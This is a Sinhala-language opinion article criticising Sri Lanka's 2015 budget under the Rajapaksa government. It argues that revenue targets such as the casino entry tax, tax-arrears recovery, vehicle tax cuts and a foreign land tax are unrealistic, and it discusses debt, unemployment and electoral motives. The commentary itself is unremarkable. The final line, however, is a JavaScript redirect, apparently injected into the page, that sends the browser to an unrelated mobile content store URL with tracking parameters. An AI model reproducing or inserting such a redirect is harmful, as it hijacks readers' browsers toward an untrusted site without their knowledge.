අය වැය 2015 ආර්ථිකයට බලපාන හැබෑ ආකාරය

මිණිසර ravayaminisara@gmail.com

සිනෝ නීතිගත කිරීමට පසුබිම සකස් කරන විට ජනතා සංවිධාන බලවත් විරෝධයක් පළ කළ බව අවුරුද්දකට පසු රටට අමතකය. මහින්ද රාජපක්ෂ ආණ්ඩුව ලබන වසරේ සිට කැසිනෝ ඇතුළු සූදු ස්ථානවලට ඇතුළු වනවිට ඇමරිකානු ඩොලර් සියයක බද්දක් අය කරන්නට යෝජනා කරයි. මෙහෙවු යෝජනා ගෙන එන විට සූදුකාරයන්ට හො`ද වැඬේයැ’යි නොකියන කෙනෙක් නැත. එහෙත්් උපායශීලි සංවර්ධන පනතට නීත්‍යනුකූල වේශයක් ඇති කරමින් තිබෙන බව පැහැදිලිව පෙනේ. කැසිනෝ නීතිගත නොකරන්නේ නම් කැසිනෝ ශාලාවකට ඇතුළුවන්නන්ට ටිකට් විකුණන්නට යෝජනා කරන්නේ මන්ද? මෙය රට පුරා දැනටත් පවත්වාගෙන යන නිල අවසරය රහිත කැසිනෝ ව්‍යාපාරය අත්කරගත් ජයග‍්‍රහණයකි. රට තුළ පවතින නීත්‍යනුකූල නොවන නොයෙක් ව්‍යාපාර සේ ම කැසිනෝ ඇතුළු සූදු ව්‍යාපාර තවදුරටත් අඛණ්ඩව රට පුරා පවතිනු ඇත.

අය වැය යෝජනා අනුව කැසිනෝ ශාලාවලට ඇතුළුවීමේ ප‍්‍රවේශපත‍්‍ර අලෙවියෙන් පමණක් රුපියල් මිලියන 2,500 ක් උපයා ගන්නේය. මේ ආදායම දුගී දුප්පතුන්ගේ සමෘද්ධි සහනාධාරයට හෝ ගොවියන්ට සෙත සලසන පොහොර සහනාධාරයට වියදම් කළ හැකිය. හැබෑවටම මෙම ඉලක්කම උපයා ගත හැකි එකක්ද? කැසිනෝ ශාලා හයක් සහ රේස් බුකි 1,094 කට වැඩි ප‍්‍රමාණයකින් ආදායම් බදු දෙපාර්තමේන්තුව වාර්ෂිකව බලපත‍්‍ර හා බදු අය කරයි. කොළඹ නගරයේ කැසිනෝ හල් හයක් ගැන ජාත්‍යන්තර කැසිනෝ නාමලේඛනයේ ඇතුළත්ය. මෙම කැසිනෝ හය අවුරුද්දකට අලූතින් රුපියල් මිලියන 2,500 ක් උපයා දිය යුතු එහි පැමිණෙන ගනුදෙනු කරුවන්ට ටිකට් විකිණී මෙන්ය. කැසිනෝ හල් එකක් අවුරුද්දකට රුපියල් මිලියන 416.6 බැගින් උපයාදීමෙන් පමණක් අය වැය ආදායම් ඉලක්ක සම්පූර්ණ වෙයි. දින 250 ක් විවෘත කර ඇති පදනම සලකා බැලූවහොත් ඇතුළුවීමේ ප‍්‍රවේශපත‍්‍රවලින් දිනකට ඩොලර් 12,820 ක ආදායමක් උපයා දෙන්නට මෙම කැසිනෝ ශාලා හයට වගකීමක් තිබේ. එනම් එක ශාලාවක් දිනපතා ප‍්‍රවේශ පත‍්‍ර 2,130 බැගින් විකිණිය යුතුය. එය ප‍්‍රායෝගික කාරණයක්ද? කැසිනෝ වෙළෙ`දපොළ සම්බන්ධ තොරතුරුවලට අනුව සාමාන්‍ය වශයෙන් ගණන් බැලූවහොත් එක අයෙකු රුපියල් 5,000 කට වඩා වියදම් කරන්නේ නැත. රුපියල් පන්දහසක සාමාන්‍යයක් වියදම් කරන අයෙකු ඇමරිකානු ඩොලරයක් රුපියල් 130 බැගින් ගණන් බලන විට රුපියල් දහතුන් දහසක් ගෙවා ප‍්‍රවේශපත‍්‍රයක් මිලදී ගෙන රාජපක්ෂ ආණ්ඩුව ආරක්ෂා කරන්නේයැයි මෙරට පොදු ජනතාව උපකල්පනය කරන්නට අවශ්‍යය.

2015 අයවැය මගින් රුපියල් මිලියන 40,000 ක් හෙවත් බදු ආදායමෙන් වැඩිම කොටසක් අපේක්ෂා කරන්නේ මෙතෙක් බදු නොගෙවූ වංචාකරුවන් පැහැර හැර ඇති බදු අයකර ගැනීමෙන් බව පෙනේ. දුගී දුප්පත් මාතර වැසියෙකු වරිපනම් නොගෙවීමේ වරදට පාරට ඇද දැමූ පළාත් පාලන ආයතනයක් ගැන දන්නා ආණ්ඩුව මෙරට මහා ධනවතුන් මිලියන දස දහස් ගණනින් බදු වංචා කරන තුරු නිහ`ඩව ඉවසා තිබේ. බදු නොගෙවන්නෝ වංචාකරුවෝය. බදු දෙපාර්තමේන්තුවට අනුව ආදායම් බදු තක්සේරු කරයි. එහි අසාධාරණයක් ඇත්නම් යළි තක්සේරු කරන්නට හැකියාවක් තිබේ. එසේ නොකර බදු නොගෙවා ඇති ආකාරයෙන්ම මේවා හිතාමතාම නොගෙවා පැහැර හැරීමක් බව ඉ`දුරා පැහැදිලිය. නොගෙවන වංචනිකයන් බදු ගෙවන තත්ත්වයට පත්කරන්නට සියයට හයේ පොලියට එය ණයක් බවට පත් කරනු ඇත. බදු නොගෙවූ එකා පොලියත් සහිතව එය ගෙවා දමා හිතේ සැනසිල්ලක් ඇතිව ව්‍යාපාර කරගෙන යනු ඇතැයි ආණ්ඩුව උපකල්පනය කරමින් සිටී.

පුද්ගලික අංශයේ ව්‍යාපාරිකයන් බදු ගෙවන්නේ නැති කල එයට පොලිය සහිතව අයකර ගැනීමේ සැලැස්මක් ඉදිරිපත් කරන ආණ්ඩුව ශ‍්‍රී ලන්කන්, මිහින් එයාර්, ඛනිජ තෙල්, විදුලිය ඇතුළු ප‍්‍රධාන ආණ්ඩුවේ අසාර්ථක ව්‍යාපාරවල ණය අයකර ගැනීම නතර කර ඒවා ප‍්‍රාග්ධනය බවට පත්කරන්නට යෝජනා කර තිබේ. අනේ, මේ රටේ දුප්පත් ගොවියන් ගත් ණය වගා කන්නය හානි වූ විට ඒවා ගොවියන්ගේ ප‍්‍රාග්ධනයක් බවට පත් නොකරන්නේ ඇයි? රන් භාණ්ඩ උගස්කර ඒවා බේරුම් කරගත නොහැකිව තමන්ගේ ඇස් ඉදිරිපිටම වෙන්දේසි කරන අවස්ථාවේ දී ඒ සුළු මුදල ආපසු දුප්පතුන්ගේ අතට දෙන්නට කල්පනා නොකරන්නේ ඇයි? රාජ්‍ය ව්‍යවසාය තුළ ඇති දූෂණ වංචා සහ අක‍්‍රමිකතා ගැන කෝප් වාර්තාව මැනැවින් දක්වා තිබේ. වත්මන් ආණ්ඩුවේ ඇමැතිවරුන්ම ආණ්ඩුවේ යාන්ත‍්‍රණය ගැන පොත් ලියා දූෂණ අනාවරණය කර ඇත. ගුවන් සේවා නඩත්තුවට ජනතාව ගෙවන වන්දිය අතිවිශාලය. එහෙව් රටක පුරවැසියන්ගේ ධනය එම ව්‍යාපාර ප‍්‍රාග්ධනීකරණය කරන්නට හරවා තිබේ. එවැනි ආයතන ආණ්ඩුවේ බැංකුවලින් ණය ගෙන නොගෙවන විට බැංකු ශක්තිමත් කරන්නට ද මහජන මුදල් මිලියන දහස් ගණනක් වෙන් කර ඇත.
මේ අනුව සලකන විට 2015 අය වැය ආදායම් ඉලක්ක බරපතළ මිථ්‍යාවකි. මෙම මිථ්‍යාව තුළ වාහන බදු අඩු කිරීමේ යෝජනාව ද සක්කයක් ලෙස එකතු වෙයි. අශ්වබල 1000 ට අඩු වාහන සහ සංචාරක කටයුතු වෙනුවෙන් භාවිත කරන වාහනවල බදු අතිවිශාල ප‍්‍රමාණයකින් අඩු කර තිබේ. මෙම බදු අඩු කිරීමේ ප‍්‍රතශත අනුව රජයට ආදායම අහිමිවීම යුක්තිසහගතය. අය වැය ඇස්තමේන්තුවලට අනුව එයින් අතිරේක රුපියල් මිලියන 5000 ක් උපයා ගනු ඇත. ඉදිකරන කොළඹ වරාය නගරයේ රේසිං කාර් ධාවන පථයේ තරග කරන්නට අශ්වබල 1000 ට අඩු වාහන ප‍්‍රයෝජනයක් නැත. මේ කුඩා වාහන මිලදී ගන්නෝ මධ්‍යම පාන්තිකයෝය. රජයේ සෑම නිලධාරියකුටම, දේශ පාලන පරම්පරාවලටම බදු රහිත බලපත‍්‍ර නිකුත් කර අතිවිශාල වාහන ප‍්‍රමාණයක් ගෙන්වා ගන්නට නිදහස දී ඇති ආණ්ඩුව රජයේ ක්ෂේත‍්‍ර නිලධාරීන්ට ද යතුරුපැදි බෙදා හරිමින් සිටී. මෙම පසුබිම අතරවාරයේ අඩු ධාරිතාව ඇති වාහන තව තවත් ආනයනය කර එයින් රුපියල් මිලියන 5,000 ක් තරම් ආදායමක් උපයාගත හැකිද? මෙම ආදායම අයකර ගන්නේ සමාජයේ වත් පොහොසත්කමක් ඇති ජන කොටසකගෙන්ද?

විදේශිකයන් ඉඩම් මිලදී ගැනීමේ දී හෝ විදේශික සමාගම් සමග හවුල්ව ආයෝජන වෙනුවෙන් ඉඩම් මිලදී ගැනීම් කරන අවස්ථාවේදී අතිරේක බද්දක් පැනවීමෙන් තවත් රුපියල් මිලියන 2,000 ක් ඉලක්ක කරයි. ආයෝජන ප‍්‍රවර්ධන අමාත්‍යවරයා පවා අලූත් ඉඩම් බද්ද නිෂ්ප‍්‍රයෝජන සහ ආයෝජන දුර්මුඛ කරන බව ප‍්‍රකාශ කර ඇති අවස්ථාවක ලෝකයේ නන් දෙසින් ව්‍යාපාරිකයන් පැමිණ මෙරට ඉඩම් මිලදී ගෙන ආණ්ඩුවට රුපියල් මිලියන දහස් ගණනින් ගෙවන්නට සූදානමක් ඇතැයි උපකල්පනය කරන්නේ නම් වරදකි. වැට් බද්ද සියයට එකකින් අඩු කරන්නට යෝජනා කරන ආණ්ඩුවේ අය වැය ලේඛනය වෙනත් බදු සංශෝධනවලින් අතිරේකව රුපියල් මිලියන 1,500 ක් උපයා ගන්නට යෝජනා කරයි. එය කෙළින්ම පාරිභෝගිකයා ගෙවන බද්දකි. විදේශිකයන්ගේ ඉඩම් බද්දෙන් උපයන තරමට වඩා මිලියන පන්සියයක් අඩුවෙන් ආනයන බදු සංශෝධනවලින් බදු උපයා ගන්නට තැත් දරන ආණ්ඩුව සාමාන්‍ය ජනතාවට සහන මල්ලක් පෙන්වා වක‍්‍රව ආපසු අය කරගන්නා ආකාරය අවබෝධ කරගත හැකිය.

2015 අය වැය මගින් මහජනතාව නිදිකර සුබ සිහිනයක සතපා තිබේ. සෑම යෝජනාවකින්ම සහන උපයා ගත හැකිය. කිසිදු ක්ෂේත‍්‍රයකට නොසලකා හැර නැත. අත දිග හැර සහන යෝජනා කරන ආණ්ඩුව ඒවාට වියදම් සොයා ගන්නේ කෙසේදැයි විග‍්‍රහයකට යන විට ආදායම් යෝජනා සම්පූර්ණ බංකොළොත් බව මෙයින් පැහැදිලිය.

සාමාන්‍යයෙන් අය වැය ලේඛනය ස්ථිරසාර ලියැවිල්ලක් නොවේ. එය අවුරුද්දේ ආදායම් සහ වියදම් සම්බන්ධ අපේක්ෂා රාමුවක් පමණකි. වසර අවසන් වන විට ප‍්‍රතිපාදන හි`ගවන විට අතිරේක ඇස්තමේන්තු මගින් වියදම් පියවා ගැනේ. ආදායම අඩුවන විට අලූත් බදු පැනවේ. දේශීය සහ විදේශීය වශයෙන් ණය ගැනේ. ඒවා කෙරෙන්නේ අවුරුද්ද අතරතුරය. පසුගිය අවුරුද්දේ අය වැය ඉදිරිපත් කළ නමුත් එහි පැවැත්ම සිදුවූයේ කෙසේදැයි විග‍්‍රහයකට ගමන් නොකරන ආණ්ඩු හැම අවුරුද්දක් පාසාම අය වැයක් ඉදිරිපත් කරයි. පසුගිය අවුරුදු දහය ඇතුළත ඉදිරිපත් කරන ලද යෝජනාවලින් සාක්ෂාත් වී ඇති ප‍්‍රමාණය කොපමණ ද යන්න ජනතාවගේ ජීවිත ගතකරන ආකාරයෙන් පෙනේ.

සමෘද්ධි ආධාර වැඩි කරන්නට සිදුවී ඇත. ආබාධිතයන්ට ද පමණක් නොව වකුගඩු රෝගීන්ට ද ආණ්ඩුවෙන් ගෙවන්නට සිදුව තිබේ. විශ‍්‍රාමිකයන් නඩත්තු කරන්නට ආණ්ඩුව භාර ගනී. පොලී අනුපාත පහළ වැටෙන විට එයට වගකියන්නේ ද ආණ්ඩුවය. පොහොර සහනාධාර ගෙවන අතර යළි වගා කරන්නටද ආධාර දෙන රටක වී අස්වැන්නට සහ රබර් වෙනුවෙන් සහතික මිලක් ගෙවන්නට සිදුව තිබේ. නිසි ආකාරයෙන් නිෂ්පාදනය දියුණු වන සහ ශ‍්‍රමයට ගෙවන මිල පාලනය වන විට මෙවැනි තත්ත්ව ඇතිවන්නේ නැත. ප‍්‍රමිතියක් නැති, ඵලදායීතාවක් ගැන නොසිතන සහ අකාර්යක්ෂම ආකාරයට රට තුළ කෘෂිකර්මය කෙරෙන විට සහනාධාරයට පමණක් නොව සහතික මිලටත් වන්දි ගෙවන්නේ පොදු ජනතාවගෙන් අය කරන බදු බව අවධාරණය කළ යුතුය. සියයට එකකින් වැට් බද්ද අඩු කරන බව කියන අයවැය දළ දේශීය නිෂ්පාදිතයේ ප‍්‍රතිශතයක් වශයෙන් බදු ආදායම සියයට 12.5 දක්වා කලින් වසරට සාපේක්ෂව සියයට 0.5 කින් නංවා ගන්නේ කෙසේදැයි විමසා බැලීම වැදගත්ය.

වසර 2020 වන විට ඇමරිකානු ඩොලර් බිලියන 7,500 ක ආර්ථික වර්ධනයක් ආණ්ඩුවේ කැමැත්තයි. අග්නිදිග ආසියාවේ හො`දම රටවල් දහය අතරට පත්වන්නට මාන බලයි. ජන හා සංඛ්‍යා ලේඛන දෙපාර්තමේන්තුවේ දත්ත අනුව මෙරට අවුරුදු 15-29 අතර තරුණ ජන ගහනයෙන් සියයට 26.5 ක් රැුකියා විරහිතය. නිෂ්පාදනය වැඩි කරන්නට අය වැය තුළ යෝජනා නැත. අලූත් කර්මාන්ත සහ ව්‍යවසාය වෙනුවෙන් සහන සපයන්නේ නැත. මෙම තරුණ ජනගහනය රැුකියා සොයන්නේ දකුණු කොරියාවෙන්ය. ඔස්ටේ‍්‍රලියා වෙන්ය. ඉදිරි වසර කිහිපය තුළ විදේශගත ශ‍්‍රමික යන්ගෙන් ඇමරිකානු ඩොලර් මිලියන 7,000 ක් අපේක්ෂා කරයි. යමක් කරන්නට හැකි ධෛර්යවන්ත තරුණයන් කවර මාර්ගයකින් හෝ විදේශ ගතවන අතර දේශපාලන දැනහැ`දුනුම්කම් ඇති කිසිවක් කරකියාගත නොහැකි පිරිස රජයේ සේවයට එකතුවෙමින් සිටිති. මේ වන විට ලෝකයේ ජන අනුපාතය අනුව වැඩිම රාජ්‍ය සේවයක් ඇති රට ශ‍්‍රී ලංකාව විය හැකිය. මිලියන විස්සක ජනගහනයට සේවය කරන්නට මිලියන 1.4ක් රාජ්‍ය සේවකයන්ය. මාසයකට රුපියල් 9,500 බැගින් තවත් ගුරු අභ්‍යාසලාභීන් පනස් දහසක් සහ පළාත් පාලන ආයතනවලට තවත් පනස් දහසක් එකතු කරන බවට යෝජනා කරන මෙවර අය වැය ඒ අතරතුර කියන්නේ රජයේ සේවයේ අවම වැටුප රුපියල් 15,000 ක් බවය. අද 9500ට වැඩට ගන්නා ගුරු සහායකයන්ට තවත් අවුරුද්දක් දෙකක් වන විට දෙගුණයක් ගෙවන්නට සිදුවෙයි. මේ බර දරන්නේ මහා භාණ්ඩාගාරයයි.

2015 අය වැය ඉදිරිපත් කිරීමේදී සංවර්ධනය සහ ජනතා සුබසෙත ගැන කතාන්දරයක් කියන නමුත් නොකියැවෙන දෙය නම් ජනාධිපතිවරණයයි. බලය රැුකගන්නට නම් ජනතාව සතුටුකර මනාපය දිනාගත යුතුය. අය වැය ලේඛනයේ සෑම වාක්‍යයක් පාසාම සැ`ගවී ඇති බලය මහජන කැමැත්ත දිනා ගැනීමයි. මහජන කැමැත්ත ලබාගෙන තුන්වැනි වතාවටත් විධායක ජනාධිපතිවරයා ලෙස පත්වන විට මේ අය වැය ලේඛනය තුළ නොකියවා ඉතිරි කරන ලද කොටස සම්පූර්ණ කරන්නට මුදල් අමාත්‍යංශයේ ලේකම්වරයා දැනටමත් තොරතුරු රැුස්කර හමාර බව ස`දහන් කළ හැකිය. සමෘද්ධි දීමනාව රුපියල් දාහකින් වැඩි කරන විට ඒ වියදම පියවා ගන්නට සීනි කිලෝව වැඩි කළ යුතු කීයකින් දැයි හෙතෙම හො`දින් දනී. පරිප්පු රුපියලකින්, පාන් පිටි ශත පනහකින් වැඩි කරන විට කැසිනෝ බද්දට වඩා වැඩි මුදලක් එකතු කරගත හැකිවෙයි. ඒවා ජනතාවට නොඅ`ගවන ජනාධිපති වරණයෙන් පසු ප‍්‍රකාශවන අය වැය බව ස`දහන් කිරීම අවශ්‍යය.
අය වැය හි`ගය දළ දේශීය නිෂ්පාදිතයේ ප‍්‍රතිශතයක් වශයෙන් සියයට 4.6 කි. දළ දේශීය නිපැයුම වැඩිවන විට මෙම හි`ගය අඩු බව පෙන්විය හැකිය. මැදි ආදායම් රටක් ලෙස ණය ගන්නේ වාණිජ පදනමකින්ය. ලෝක බැංකුවෙන් හෝ ජාත්‍යන්තර මූල්‍ය අරමුදලෙන් නොලැබෙන සහන ණය වෙනුවට චීනයෙන් හෝ ඇමරිකාවේ සංවර්ධන බැ`දුම්කරවලින් ගන්නා ණයවලට අවුරුද්දකට සියයට 5-8 අතර ඩොලර් පොලියක් ගෙවන්නට සිදුවෙයි. විදේශීය ණය වශයෙන් ඇමරිකානු ඩොලර් මිලියන 251 ක් සහ දේශීය වශයෙන් රැුපියල් මිලියන 270 ක් අය වැය පියවා ගැනීමට ණය ගන්නට ඉලක්ක කර ඇත. මෙම ණය සමග මෙරට ණය ප‍්‍රමාණය ටි‍්‍රලියන තුන ඉක්මවායාම පහසුවෙන් සිදුවිය හැකිය. එයට ගෙවන වාරිකය බාර කෙරෙන්නේ අනාගත පරපුරටය. මහින්ද රාජපක්ෂ ආණ්ඩුවේ අනාගත පැවැත්ම සම්බන්ධව ස්ථිරසාර ඉලක්කයක් ඇත්නම් සහ වසර 2020 වන විට පාලනය කරන පෙළපත ගැන අදහසක් තිබේ නම් රටේ ණය බර අනාගතයට උරුමයක් කිරීම බරපතළ ප‍්‍රශ්නයක් වනු නොඅනුමානය.

window.location = “http://www.mobilecontentstore.mobi/?sl=319481-c261c&data1=Track1&data2=Track2”;